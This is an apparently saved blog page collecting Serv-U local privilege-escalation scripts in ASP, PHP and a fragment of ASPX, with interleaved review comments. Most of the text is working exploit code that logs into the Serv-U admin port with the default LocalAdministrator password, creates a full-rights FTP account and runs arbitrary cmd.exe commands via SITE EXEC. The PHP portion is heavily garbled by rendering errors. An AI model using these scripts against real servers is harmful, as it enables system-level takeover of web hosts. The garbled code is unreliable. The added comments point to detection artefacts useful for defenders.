脚本:网站的编辑语言
serv-u利用脚本(asp/aspx/php)
serv-u利用脚本(asp/aspx/php)
每次用都得搜，说不准哪天就搜不到了，直接存起来是最好的选择。
<%@ LANGUAGE = VBScript %>
<%
'Serv-U ASP privilege-escalation program
'author: Goldsun[at]84823714
'DO NOT use it to do evil things!
' Overview (review note): the page drives the Serv-U administrative protocol
' from inside the web server by sending FTP-admin command lines as the body of
' an XMLHTTP request to 127.0.0.1:<port>. The bodies built below create a
' temporary domain ("goldsun", port 65500) plus an account "go"/"od" with the
' full permission set (RWAMELCDP) on the chosen drive, and later delete the
' domain again. Detection hints that follow directly from this script:
' loopback HTTP requests to /goldsun/upadmin/s1 or /goldsun/upadmin/s3, and a
' Serv-U domain "goldsun" on port 65500 or a user "go" in the Serv-U config.
' Request parameters (unvalidated except "action"): action (numeric),
' u/p (Serv-U admin user and password), port (Serv-U admin port),
' c (command; on this page it is only echoed), f (drive, first two characters).
' The typographic quotes in the string literals are an artefact of this copy,
' not valid VBScript.
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request(“action”)
' Only numeric actions are accepted; anything else ends the response.
if not isnumeric(action) then response.end
user = trim(request(“u”))
pass = trim(request(“p”))
port = trim(request(“port”))
cmd = trim(request(“c”))
f=trim(request(“f”))
' f is the drive the new account is rooted on: by default the system drive
' reported by Gpath() (defined in the last <% %> block of the page), otherwise
' the first two characters of the supplied value.
if f="" then
f=gpath()
else
f=left(f,2)
end if
' Port of the temporary domain created in case 1.
ftpport = 65500
' timeout is assigned but not referenced anywhere in this copy of the script.
timeout=3
' Serv-U admin-protocol lines, one command per vbCrLf.
loginuser = “User " & user & vbCrLf
loginpass = “Pass " & pass & vbCrLf
' -DELETEDOMAIN removes the temporary domain (also used alone for cleanup in case 3).
deldomain = “-DELETEDOMAIN” & vbCrLf & “-IP=0.0.0.0” & vbCrLf & " PortNo=” & ftpport & vbCrLf
mt = “SITE MAINTENANCE” & vbCrLf
' -SETDOMAIN creates domain "goldsun" bound to 0.0.0.0:65500.
newdomain = “-SETDOMAIN” & vbCrLf & “-Domain=goldsun|0.0.0.0|” & ftpport & “|-1|1|0” & vbCrLf & “-TZOEnable=0” & vbCrLf & " TZOKey=” & vbCrLf
' -SETUSERSETUP creates user "go" (password "od") with HomeDir c://,
' Maintenance=System and Access c://|RWAMELCDP, i.e. every right on the drive.
' "c:" is swapped for the selected drive after the literal is assembled.
newuser = “-SETUSERSETUP” & vbCrLf & “-IP=0.0.0.0” & vbCrLf & “-PortNo=” & ftpport & vbCrLf & “-User=go” & vbCrLf & “-Password=od” & vbCrLf & _
“-HomeDir=c://” & vbCrLf & “-LoginMesFile=” & vbCrLf & “-Disable=0” & vbCrLf & “-RelPaths=1” & vbCrLf & _
“-NeedSecure=0” & vbCrLf & “-HideHidden=0” & vbCrLf & “-AlwaysAllowLogin=0” & vbCrLf & “-ChangePassword=0” & vbCrLf & _
“-QuotaEnable=0” & vbCrLf & “-MaxUsersLoginPerIP=-1” & vbCrLf & “-SpeedLimitUp=0” & vbCrLf & “-SpeedLimitDown=0” & vbCrLf & _
“-MaxNrUsers=-1” & vbCrLf & “-IdleTimeOut=600” & vbCrLf & “-SessionTimeOut=-1” & vbCrLf & “-Expire=0” & vbCrLf & “-RatioUp=1” & vbCrLf & _
“-RatioDown=1” & vbCrLf & “-RatiosCredit=0” & vbCrLf & “-QuotaCurrent=0” & vbCrLf & “-QuotaMaximum=0” & vbCrLf & _
“-Maintenance=System” & vbCrLf & “-PasswordType=Regular” & vbCrLf & “-Ratios=None” & vbCrLf & " Access=c://|RWAMELCDP" & vbCrLf
quit = “QUIT” & vbCrLf
' Re-root the new account on the drive chosen via f.
newuser=replace(newuser,“c:”,f)
select case action
' action=1: log in to the admin port, delete any earlier "goldsun" domain, then
' create the domain and the user. The request is asynchronous (True) and the
' XMLHTTP object is parked in the session so that "case else" can abort it.
case 1
set a=Server.CreateObject(“Microsoft.XMLHTTP”)
a.open “GET”, “http://127.0.0.1:” & port & “/goldsun/upadmin/s1”,True, “”, “”
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
set session(“a”)=a
' action=3 (next <% %> block, collapsed onto one line in this copy): same login,
' then only -DELETEDOMAIN, i.e. cleanup. No "case 2" appears in this copy;
' session("b") in "case else" and the "command executed" text printed after
' case 3 suggest one existed (presumably the step that used the "go" account
' and the c parameter), but it is not recoverable from this page.
%>
<% case 3 set c=Server.CreateObject("Microsoft.XMLHTTP") c.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", "" c.send loginuser & loginpass & mt & deldomain & quit set session("c")=c %>
提权完毕,已执行了命令:
<%=cmd%>
<%
' Any other action: abort and release the three XMLHTTP objects kept in the
' session. "on error resume next" hides the errors raised when a slot is empty.
case else
on error resume next
set a=session(“a”)
set b=session(“b”)
set c=session(“c”)
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
' The final (collapsed) <% %> block holds "end select" and two helpers:
' Gpath() returns the lower-cased drive of the Windows system folder
' (FileSystemObject.GetSpecialFolder(0)), falling back to "c:" when the object
' cannot be created; GName() builds this script's own URL from server variables
' and is not called anywhere visible on this page.
%>
Serv-U 提升权限 ASP版 Goldsun[at]84823714 |
用户名: |
|
口 令: |
|
端 口: |
|
系统路径: |
|
命 令: |
|
<% end select function Gpath() on error resume next err.clear set f=Server.CreateObject("Scripting.FileSystemObject") if err.number>0 then gpath="c:" exit function end if gpath=f.GetSpecialFolder(0) gpath=lcase(left(gpath,2)) set f=nothing end function Function GName() If request.servervariables("SERVER_PORT")="80" Then GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name")) Else GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name")) End If End Function %> ============================================================================================ //变量初始化
// Defaults (review note): these are the Serv-U "local administrator" settings
// the PHP variant relies on -- the administrative listener on 127.0.0.1:43958
// and the LocalAdministrator account that old Serv-U releases shipped with.
// The password line is garbled in this copy (a math renderer consumed part of
// it). Every value can be overridden from the query string without validation,
// and nothing authenticates the caller of this page itself.
$addr = ‘0.0.0.0’;
$ftpport = 21;
// Serv-U administrative port.
$adminport = 43958;
$adminuser = ‘LocalAdministrator’;
KaTeX parse error: Expected 'EOF', got '#' at position 14: adminpass = '#̲l@ak#.lk;0@P’;
// Account that up() creates, and its home directory / Access path.
$user = ‘wofeiwo’;
$password = ‘wrsky’;
$homedir = ‘C://’;
// Directory where ftpcmd() expects cmd.exe. The doubled forward slashes here
// and the "/r/n" line endings below look like backslashes lost in rendering.
$dir = ‘C://WINNT//System32//’;
// Assign from the request when any parameter is present
if ($_GET){
$addr = $_GET[‘addr’] ;
$ftpport = $_GET[‘ftpport’] ;
$adminport = $_GET[‘adminport’] ;
$adminuser = $_GET[‘adminuser’] ;
$adminpass = $_GET[‘adminpass’] ;
$user = $_GET[‘user’] ;
$password = $_GET[‘password’] ;
// The next line is garbled in this copy; it reads as an assignment of
// $homedir from $_GET['homedir'] followed by "if ($_GET['dir'])".
$homedir = G E T [ ′ h o m e d i r ′ ] ; i f ( _GET['homedir'] ; if ( GET[′homedir′];if(_GET[‘dir’]){
$dir = $_GET[‘dir’] ;
}
}
?>
-=
Serv-U All Version本地提升权限Exp10it Ver 1.5
添加Serv-U用户部分
主机IP: |
|
主机Ftp端口: |
|
主机Ftp管理端口: |
|
主机Ftp管理用户: |
|
主机Ftp管理密码: |
|
添加的用户名: |
|
添加的用户名密码: |
|
用户主目录(别忘了写"/"): |
|
|
|
命令回显:
// Add user
// Dispatch: when the action parameter equals "up" (the parameter name is partly
// lost in this copy), call up() with the values initialised at the top.
if (KaTeX parse error: Expected '}', got 'EOF' at end of input: …n']=="up"){ up(addr, f t p p o r t , ftpport, ftpport,adminport, a d m i n u s e r , adminuser, adminuser,adminpass, u s e r , user, user,password,$homedir);
}
?>
执行命令部分
主机Ftp端口: |
|
用户名: |
|
用户名密码: |
|
系统路径(别忘了写"/"): |
|
执行的命令: |
|
命令回显: //执行命令
// Dispatch: when the action parameter ends in "cute" (presumably "execute";
// the name is garbled here), call ftpcmd() with $_GET['cmd'] passed through
// unfiltered.
if (KaTeX parse error: Expected '}', got 'EOF' at end of input: …cute"){ ftpcmd(ftpport, u s e r , user, user,password, d i r , dir, dir,_GET[‘cmd’]);
}
?>
Copycenter (C) 2004
我非我 All centers Reserved.
// Main function definition: add user
/**
 * Creates a Serv-U account through the local administrative port.
 *
 * Opens a socket to 127.0.0.1:$adminport, logs in with $adminuser/$adminpass,
 * sends SITE MAINTENANCE and a -SETUSERSETUP block describing the new account
 * ($user/$password, HomeDir $homedir, Maintenance=System, Access
 * $homedir|RWAMELCDP -- the full permission set), then QUIT, and echoes every
 * reply line. On connect failure it echoes $errstr/$errno instead.
 *
 * Review notes: the body is garbled in this copy (variable names split into
 * letters, "/r/n" instead of CRLF escapes); no fclose() follows the read loop,
 * unlike ftpcmd(). From a defender's view the observable artefacts are an
 * admin-port login from the web server's own process followed by a new user
 * with Maintenance=System in the Serv-U configuration.
 */
function up( a d d r , addr, addr,ftpport, a d m i n p o r t , adminport, adminport,adminuser, a d m i n p a s s , adminpass, adminpass,user, p a s s w o r d , password, password,homedir){
$fp = fsockopen (“127.0.0.1”, $adminport, $errno, e r r s t r , 8 ) ; i f ( ! errstr, 8); if (! errstr,8);if(!fp) {
echo “ e r r s t r ( errstr ( errstr(errno)
/n”;
} else {
// Admin login; the -SETUSERSETUP lines after SITE MAINTENANCE describe the new account.
fputs ( f p , " U S E R " . fp, "USER ". fp,"USER".adminuser."/r/n");
sleep (1);
fputs ( f p , " P A S S " . fp, "PASS ". fp,"PASS".adminpass."/r/n");
sleep (1);
fputs ( f p , " S I T E M A I N T E N A N C E / r / n " ) ; s l e e p ( 1 ) ; f p u t s ( fp, "SITE MAINTENANCE/r/n"); sleep (1); fputs ( fp,"SITEMAINTENANCE/r/n");sleep(1);fputs(fp, “-SETUSERSETUP/r/n”);
fputs ( f p , " − I P = " . fp, "-IP=". fp,"−IP=".addr."/r/n");
fputs ( f p , " − P o r t N o = " . fp, "-PortNo=". fp,"−PortNo=".ftpport."/r/n");
fputs ( f p , " − U s e r = " . fp, "-User=". fp,"−User=".user."/r/n");
fputs ( f p , " − P a s s w o r d = " . fp, "-Password=". fp,"−Password=".password."/r/n");
fputs ( f p , " − H o m e D i r = " . fp, "-HomeDir=". fp,"−HomeDir=".homedir."/r/n");
fputs ( f p , " − L o g i n M e s F i l e = / r / n " ) ; f p u t s ( fp, "-LoginMesFile=/r/n"); fputs ( fp,"−LoginMesFile=/r/n");fputs(fp, “-Disable=0/r/n”);
fputs ( f p , " − R e l P a t h s = 0 / r / n " ) ; f p u t s ( fp, "-RelPaths=0/r/n"); fputs ( fp,"−RelPaths=0/r/n");fputs(fp, “-NeedSecure=0/r/n”);
fputs ( f p , " − H i d e H i d d e n = 0 / r / n " ) ; f p u t s ( fp, "-HideHidden=0/r/n"); fputs ( fp,"−HideHidden=0/r/n");fputs(fp, “-AlwaysAllowLogin=0/r/n”);
fputs ( f p , " − C h a n g e P a s s w o r d = 1 / r / n " ) ; f p u t s ( fp, "-ChangePassword=1/r/n"); fputs ( fp,"−ChangePassword=1/r/n");fputs(fp, “-QuotaEnable=0/r/n”);
fputs ( f p , " − M a x U s e r s L o g i n P e r I P = − 1 / r / n " ) ; f p u t s ( fp, "-MaxUsersLoginPerIP=-1/r/n"); fputs ( fp,"−MaxUsersLoginPerIP=−1/r/n");fputs(fp, “-SpeedLimitUp=-1/r/n”);
fputs ( f p , " − S p e e d L i m i t D o w n = − 1 / r / n " ) ; f p u t s ( fp, "-SpeedLimitDown=-1/r/n"); fputs ( fp,"−SpeedLimitDown=−1/r/n");fputs(fp, “-MaxNrUsers=-1/r/n”);
fputs ( f p , " − I d l e T i m e O u t = 600 / r / n " ) ; f p u t s ( fp, "-IdleTimeOut=600/r/n"); fputs ( fp,"−IdleTimeOut=600/r/n");fputs(fp, “-SessionTimeOut=-1/r/n”);
fputs ( f p , " − E x p i r e = 0 / r / n " ) ; f p u t s ( fp, "-Expire=0/r/n"); fputs ( fp,"−Expire=0/r/n");fputs(fp, “-RatioUp=1/r/n”);
fputs ( f p , " − R a t i o D o w n = 1 / r / n " ) ; f p u t s ( fp, "-RatioDown=1/r/n"); fputs ( fp,"−RatioDown=1/r/n");fputs(fp, “-RatiosCredit=0/r/n”);
fputs ( f p , " − Q u o t a C u r r e n t = 0 / r / n " ) ; f p u t s ( fp, "-QuotaCurrent=0/r/n"); fputs ( fp,"−QuotaCurrent=0/r/n");fputs(fp, “-QuotaMaximum=0/r/n”);
fputs ( f p , " − M a i n t e n a n c e = S y s t e m / r / n " ) ; f p u t s ( fp, "-Maintenance=System/r/n"); fputs ( fp,"−Maintenance=System/r/n");fputs(fp, “-PasswordType=Regular/r/n”);
fputs ( f p , " − R a t i o s = N o n e / r / n " ) ; f p u t s ( fp, "-Ratios=None/r/n"); fputs ( fp,"−Ratios=None/r/n");fputs(fp, " Access=". h o m e d i r . " ∣ R W A M E L C D P / r / n " ) ; f p u t s ( homedir."|RWAMELCDP/r/n"); fputs ( homedir."∣RWAMELCDP/r/n");fputs(fp, “QUIT/r/n”);
sleep (1);
// Echo the server's replies until EOF; the socket is never closed here.
while (!feof(KaTeX parse error: Expected '}', got 'EOF' at end of input: … { echo fgets (fp,128);
}
}
}
// Main function definition: execute command
/**
 * Logs in to the local FTP port as $user/$password (the account up() created)
 * and issues "SITE EXEC <dir>cmd.exe /c <cmd>", then QUIT, echoing the server's
 * reply lines before closing the socket with fclose(). On connect failure it
 * echoes $errstr/$errno instead.
 *
 * Review notes: $cmd arrives straight from $_GET['cmd'] (see the dispatch
 * above) with no filtering. The command presumably runs in the security
 * context of the Serv-U service process, which is what makes this a privilege
 * escalation -- confirm against the deployment. The body is garbled in this
 * copy (variable names split into letters, "/r/n" instead of CRLF escapes).
 */
function ftpcmd( f t p p o r t , ftpport, ftpport,user, p a s s w o r d , password, password,dir,$cmd){
$conn_id = fsockopen (“127.0.0.1”, $ftpport, $errno, $errstr, 8);
if (!KaTeX parse error: Expected '}', got 'EOF' at end of input: …nn_id) { echo "errstr (KaTeX parse error: Expected 'EOF', got '}' at position 16: errno)
/n"; }̲ else { fputs (conn_id, "USER ". u s e r . " / r / n " ) ; s l e e p ( 1 ) ; f p u t s ( user."/r/n"); sleep (1); fputs ( user."/r/n");sleep(1);fputs(conn_id, "PASS ". p a s s w o r d . " / r / n " ) ; s l e e p ( 1 ) ; f p u t s ( password."/r/n"); sleep (1); fputs ( password."/r/n");sleep(1);fputs(conn_id, “SITE EXEC “. d i r . " c m d . e x e / c " . dir."cmd.exe /c ". dir."cmd.exe/c".cmd.”/r/n”);
fputs ( c o n n i d , " Q U I T / r / n " ) ; s l e e p ( 1 ) ; w h i l e ( ! f e o f ( conn_id, "QUIT/r/n"); sleep (1); while (!feof( connid,"QUIT/r/n");sleep(1);while(!feof(conn_id)) {
echo fgets (KaTeX parse error: Expected 'EOF', got '}' at position 15: conn_id,128); }̲ fclose(conn_id);
}
}
// Remove escape characters
/**
 * Recursively applies stripslashes() to the values of $array (the usual
 * magic_quotes clean-up), skipping the 'argc' and 'argv' keys plus a further
 * key-name test that is garbled in this copy, and descending into nested
 * arrays. Takes $array by reference and also returns it.
 *
 * Review notes: no call site is visible on this page. The loop uses each(),
 * which PHP 7.2 deprecated and PHP 8 removed.
 */
function stripslashes_array(&KaTeX parse error: Expected '}', got 'EOF' at end of input: … { while (list(key, v a r ) = e a c h ( var) = each( var)=each(array)) {
if ($key != ‘argc’ && KaTeX parse error: Expected 'EOF', got '&' at position 15: key != 'argv' &̲& (strtoupper(key) != k e y ∣ ∣ ′ ′ . i n t v a l ( key || ''.intval( key∣∣′′.intval(key) == "KaTeX parse error: Expected '}', got 'EOF' at end of input: … if (is_string(var)) {
a r r a y [ array[ array[key] = stripslashes(KaTeX parse error: Expected 'EOF', got '}' at position 7: var); }̲ if (is_array(var)) {
a r r a y [ array[ array[key] = stripslashes_array($var);
}
}
}
return $array;
}
?>
<%@ Page Language=“VB” Debug=“true” %>
<%@ import Namespace=“System.Net.Sockets” %>
<%-- ASPX variant (truncated on this page): only the two page directives
     survive. The labels that follow are form fields whose defaults are the
     Serv-U local administrator name, its password and the admin port 43958.
     Debug="true" is left enabled in the directive. --%>
from Serv-U 2 admin by lake2
Name LocalAdministrator
PWD #l@$ak#.lk;0@P
Port 43958
cmd